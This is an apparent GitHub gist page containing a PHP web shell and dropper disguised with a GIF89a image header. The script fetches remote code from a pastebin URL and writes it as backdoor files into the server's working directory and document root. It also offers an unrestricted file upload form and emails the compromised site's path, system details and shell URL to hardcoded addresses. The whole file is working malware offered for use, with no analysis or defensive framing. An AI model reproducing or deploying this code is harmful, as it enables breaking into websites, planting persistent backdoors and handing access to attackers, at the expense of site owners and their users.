Skip to content

Instantly share code, notes, and snippets.

@vncloudsco
Created January 21, 2020 07:49
Show Gist options
  • Save vncloudsco/905d279a8c797e72cb9174da3f7cc5c5 to your computer and use it in GitHub Desktop.
Save vncloudsco/905d279a8c797e72cb9174da3f7cc5c5 to your computer and use it in GitHub Desktop.
GIF89a;
<?php
error_reporting(0);
function parah($url){
$im = curl_init($url);
curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($im, CURLOPT_HEADER, 0);
return curl_exec($im);
curl_close($im);
}
echo '<center><br><b>h0d3_g4nT3nG'.'<br>'.'Uname:'.php_uname().'<br></b></center>';
$asu =rand();
$filename="dont-dell$asu.php";
$fget=file_get_contents("https://pastebin.com/raw/UkW9ywcC");
// WGET Backdoor
$path=getcwd().DIRECTORY_SEPARATOR;
$fileopen=fopen("$path/$filename",'w');
$execfile=fwrite($fileopen,$fget);
if($execfile)
{
echo "Success UP: $path$filename <br>";
}
else {
echo "Failed execute newfile $filename in $path <br>";
}
if(isset($_POST['Submit'])){
$filedir = "";
$maxfile = '2000000';
$mode = '0644';
$userfile_name = $_FILES['image']['name'];
$userfile_tmp = $_FILES['image']['tmp_name'];
if(isset($_FILES['image']['name'])) {
$qx = $filedir.$userfile_name;
@move_uploaded_file($userfile_tmp, $qx);
@chmod ($qx, octdec($mode));
echo" <a href=$userfile_name><center><b>Sucess Upload :D ==> $userfile_name</b></center></a>";
}
}
else{
echo'<center><form method="POST" action="#" enctype="multipart/form-data"><input type="file" name="image"><br><input type="Submit" name="Submit" value="Upload"></form></center>';
}
$web = $_SERVER['HTTP_HOST']."";
$upload = $_SERVER['DOCUMENT_ROOT']. "/jembu$asu.php";
$config = parah("https://pastebin.com/raw/UkW9ywcC");
$open = fopen($upload, 'w');
fwrite($open, $config);
fclose($open);
if(file_exists($upload)){
echo "Shell Ke Upload : http://$web/jembu$asu.php<br>" ;
}else {
echo "Gagal Upload Shell -_- <br>";
}
$tujuanmail = 'barbarnime@gmail.com,tukangcekstil@hotmail.com';
$x_path = "http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'];
$pesan_alert = "fix $x_path :p $path$filename \n Uname : ".php_uname()." \n Acess : http://$web/jembu$asu.php \n *IP Address : [ " . $_SERVER['REMOTE_ADDR'] . " ] \n";
@mail($tujuanmail, "Timthumb Bot !!", $pesan_alert, "[ " . $_SERVER['REMOTE_ADDR'] . " ]");
?>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment